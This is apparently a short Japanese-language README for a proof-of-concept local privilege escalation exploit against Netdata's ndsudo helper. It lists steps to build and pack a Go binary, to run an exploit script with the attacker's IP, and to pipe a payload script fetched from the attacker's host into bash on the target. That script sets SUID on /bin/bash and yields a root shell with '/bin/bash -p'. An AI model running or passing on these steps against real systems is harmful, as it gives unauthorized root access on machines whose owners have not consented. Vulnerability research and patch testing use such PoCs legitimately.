
Netdata ndsudo PoC
Netdata ndsudo PoC
バイナリをビルド:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
bashスクリプトを実行:
bash exploit.sh <YOUR IP>
ターゲットマシンで書き込み可能なディレクトリで実行:
curl http://<YOUT IP>:8000/payload.sh | bash
これにより、nvmeバイナリが自動的にダウンロードされ、パスがエクスポートされ、ndsudoが実行され、/bin/bashにSUIDが追加されます。
おそらく、exploit.sh内のndsudoパスを変更する必要があります。
権限を昇格するには、以下を実行:
/bin/bash -p
このエクスプロイトはhttps://github.com/AzureADTrent/CVE-2024-32019-POC に基づいています。テストした際、以下のエラーが発生しました:
execve: Exec format error
そのため、Goで独自のものを作成することにしました。